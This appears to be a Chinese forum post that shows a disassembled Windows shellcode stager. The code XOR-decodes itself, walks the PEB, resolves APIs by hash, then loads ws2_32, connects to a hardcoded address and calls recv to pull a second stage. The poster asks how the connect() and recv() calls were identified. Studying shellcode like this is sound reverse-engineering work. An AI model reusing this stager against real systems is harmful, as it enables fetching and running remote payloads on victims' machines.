00402018 eb 15 jmp short link-03.0040202f
0040201a b9 8be61341 mov ecx,4113e68b
0040201f 81f1 39e61341 xor ecx,4113e639
00402025 5e pop esi
00402026 807431 ff 17 xor byte ptr ds:[ecx+esi-1],17
0040202b ^e2 f9 loopd short link-03.00402026
0040202d eb 05 jmp short link-03.00402034
0040202f e8 e6ffffff call link-03.0040201a
00402034 33db xor ebx,ebx
00402036 64:8b43 30 mov eax,dword ptr fs:[ebx+30]
0040203a 8b40 0c mov eax,dword ptr ds:[eax+c]
0040203d 8b70 1c mov esi,dword ptr ds:[eax+1c]
00402040 ad lods dword ptr ds:[esi]
00402041 8b78 08 mov edi,dword ptr ds:[eax+8]
00402044 e8 45000000 call link-03.0040208e
00402049 53 push ebx ; ------ syscall finder
0040204a 56 push esi
0040204b 8b5f 3c mov ebx,dword ptr ds:[edi+3c]
0040204e 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78]
00402052 03df add ebx,edi
00402054 53 push ebx
00402055 8b5b 20 mov ebx,dword ptr ds:[ebx+20]
00402058 03df add ebx,edi
0040205a 53 push ebx
0040205b 83c3 04 add ebx,4
0040205e 8b33 mov esi,dword ptr ds:[ebx]
00402060 03f7 add esi,edi
00402062 33c9 xor ecx,ecx
00402064 ac lods byte ptr ds:[esi]
00402065 32c8 xor cl,al
00402067 c1c1 05 rol ecx,5
0040206a 84c0 test al,al
0040206c ^75 f6 jnz short link-03.00402064
0040206e 2bca sub ecx,edx
00402070 ^75 e9 jnz short link-03.0040205b
00402072 58 pop eax
00402073 2bd8 sub ebx,eax
00402075 d1eb shr ebx,1
00402077 5e pop esi
00402078 035e 24 add ebx,dword ptr ds:[esi+24]
0040207b 03df add ebx,edi
0040207d 66:8b0b mov cx,word ptr ds:[ebx]
00402080 8b5e 1c mov ebx,dword ptr ds:[esi+1c]
00402083 03df add ebx,edi
00402085 8b048b mov eax,dword ptr ds:[ebx+ecx*4]
00402088 03c7 add eax,edi
0040208a 5e pop esi
0040208b 5b pop ebx
0040208c ffe0 jmp eax
0040208e 5e pop esi ; ------- end
0040208f 68 33320000 push 3233
00402094 68 7773325f push 5f327377
00402099 54 push esp
0040209a ba 926e0484 mov edx,84046e92
0040209f ffd6 call esi ; loadlibrarya()
004020a1 8bf8 mov edi,eax
004020a3 81ec 00020000 sub esp,200
004020a9 8bec mov ebp,esp
004020ab 53 push ebx
004020ac 6a 01 push 1
004020ae 6a 02 push 2
004020b0 ba 83538300 mov edx,835383
004020b5 ffd6 call esi ; socket()
004020b7 53 push ebx
004020b8 53 push ebx
004020b9 68 3e2fd9fe push fed92f3e
004020be 68 02003c19 push 193c0002
004020c3 8bd4 mov edx,esp
004020c5 8bd8 mov ebx,eax
004020c7 6a 10 push 10
004020c9 52 push edx
004020ca 53 push ebx
004020cb ba 6330605a mov edx,5a603063
004020d0 ffd6 call esi ; connect()
004020d2 50 push eax
004020d3 b4 02 mov ah,2
004020d5 50 push eax
004020d6 55 push ebp
004020d7 53 push ebx
004020d8 ba 005860e2 mov edx,e2605800
004020dd ffd6 call esi ; recv()
004020df bf acac0685 mov edi,8506acac
这是一段shellcode
请教
004020d0 ffd6 call esi ; connect()这里通过什么判断使用了connect函数?是怎么分析出来的?
同样
004020dd ffd6 call esi ; recv()?
[课程]Linux pwn 探索篇!